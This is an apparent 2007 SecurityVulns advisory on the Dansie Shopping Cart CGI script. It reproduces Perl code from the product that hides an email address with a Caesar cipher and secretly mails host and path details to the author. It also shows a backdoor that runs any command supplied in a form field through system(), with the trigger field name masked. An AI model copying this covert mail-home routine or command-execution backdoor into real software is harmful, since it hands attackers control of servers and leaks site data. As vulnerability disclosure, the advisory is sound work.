Dansie Cart Script Exploit Reported

2007-06-04T00:00:00
ID SECURITYVULNS:DOC:17181
Type securityvulns
Reporter Securityvulns
Modified 2007-06-04T00:00:00

Description

Synopsis : This program -deliberately- allows arbitrary commands to be executed on the victim server.

One of our clients, while installing and configuring the Dansie Shopping Cart, ran into difficulty integrating PGP, the shopping cart program, and our secure server setup. While trying to assist our client with the cart and PGP configuration we discovered a couple of things.

The CGI, under certain conditions, sends an email to the author of the Dansie shopping cart software, 'tech@dansie.net'. This is not readily apparent as the code that handles this transaction incorporates a simple Caesar Cipher to hide the email address. The cipher is handled via the subroutine 'there2':


sub there2 { $ = "$[0]"; tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/; tr//-/; tr/\@/\./; return $; }


The call that creates this email address and sends the mail is the function 'there3'.


sub there3 { if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog")) { $a = &there2('8v59')."\@". &there2('kte3cv').".". &there2('ev8'); $b = &there2('8v59_3jhhzi8'); pop(@there2); pop(@there2); $c = &there2("@there2"); open (TECH, "|$mailprog $a"); print TECH "To: $a\n"; print TECH "From: $a\n"; print TECH "Subject: $b\n\n"; print TECH "$path3\n"; print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n"; print TECH "$c\n"; print TECH "$e $there\n" if ($e); close (TECH); } }


The ciphered strings, when passed through 'there2', result in:

8v59 == tech kte3cv == dansie ev8 == net 8v59_3jhhzi8 == tech-support $a == tech@dansie.net $b == Subject: tech-support

This seems curious, but plausible reasons could include insuring License compliance, or maybe the cart automatically sends this email when an error occurs. The program definitely goes out of its way to hide the fact that the mail is being sent.

While going through the rest of the code we discovered a much more interesting item.

(We've masked out the actual trigger element with question marks)


if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) ) { if ( $ENV{'OS'} ) { system("$FORM{'?????????'}"); } else { open(ELIF,"|$FORM{'?????????'}"); } exit; }